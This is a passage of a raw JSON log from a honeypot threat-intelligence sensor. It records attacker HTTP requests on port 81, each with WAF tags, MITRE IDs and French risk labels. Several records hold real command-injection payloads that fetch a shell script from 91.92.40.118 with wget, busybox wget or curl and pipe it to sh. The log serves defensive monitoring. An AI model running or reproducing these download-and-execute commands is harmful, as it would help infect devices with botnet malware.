HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 164\\r\\nConnectio\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022c964f369f56cc056d9c95aed9c7ddacb0f45b253\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/command.php\u0022, \u0022request_line\u0022: \u0022POST \/command.php HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/command.php HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 164\\r\\nConnectio\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/command.php\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/command.php\u0022, \u0022request_line\u0022: \u0022POST \/command.php HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/command.php\u0022, \u0022evidence_snippet\u0022: \u0022POST \/command.php HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 164\\r\\nConnectio\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 6 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":304},{"id":11860777,"ip":"45.156.87.213","ts":"2026-07-14 08:22:34.000000","proto":"tcp","src_port":59992,"dst_port":81,"service":"http","classification":"config_file_probe","waf_score":48,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/login.cgi?cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlcli%60","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u002236a2335d4f2b979a1e3edec5c7dfb201adb24fc1\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 274, \u0022payload_entropy\u0022: 5.059376276515006, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 74.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 64, \u0022tag_count\u0022: 13, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u0022eb752862cf777f499e94f44ee466f9d908fde3ba\u0022, \u0022event_fingerprint\u0022: \u0022c7e748f763fc207c212311eacb7fc34e0aa9feb0\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 127, \u0022precision_signals\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022backup_file_scan\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022a09f94049f4477d74416dcb1d548182a\u0022, \u0022path_pattern_hash\u0022: \u0022f6e9baaa731f11923b2ba9541a8713d5\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 64}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlcli%60\u0022, \u0022query_string\u0022: \u0022cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlcli%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/login.cgi?cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlcli%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/login.cgi?cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlcli%60\u0022, \u0022query_string\u0022: \u0022cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlcli%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/login.cgi?cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlcli%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/login.cgi?cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlcli%60 HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nCon\u0022, \u0022payload_snippet\u0022: \u0022GET \/login.cgi?cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1083\u0022], \u0022mitre\u0022: \u0022T1083\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022, \u0022config_leak_scan\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u002211df06df642728feca9b5e49afeba7133b7edd10\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlcli%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/login.cgi?cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.s\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/login.cgi?cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.\u0022, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wg\u2026\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 7 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 64\/100 (Moyen) \u2014 MITRE T1083 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 64, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Sensitive\u0022, \u0022Upstream\u0022, \u0022Waf Score\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1083\u0022, \u0022mitre_technique\u0022: \u0022T1083\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlcli%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/login.cgi?cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.s\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wg\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/login.cgi?cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 7 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_login\u0022, \u0022http_sensitive_path\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_login\u0022, \u0022http_sensitive_path\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":274},{"id":11860778,"ip":"45.156.87.213","ts":"2026-07-14 08:22:34.000000","proto":"tcp","src_port":59996,"dst_port":81,"service":"http","classification":"rest_api_enum","waf_score":66,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950316:lfi-14\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950600:k8s-api\u0022]","http_method":"GET","http_target":"\/api\/v1\/status?command=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20xiaomi%60","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 3, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u0022a08e609c3d8febbd409eb3ccc540c53b477b79ce\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 285, \u0022payload_entropy\u0022: 5.123147260085033, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 60.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 60.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 58, \u0022tag_count\u0022: 17, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u0022908d83fc0d424495a1ab6e83b4412c060e298bcf\u0022, \u0022event_fingerprint\u0022: \u0022b646b0a171a54bb32326a7f3e87aed212e1915d8\u0022, 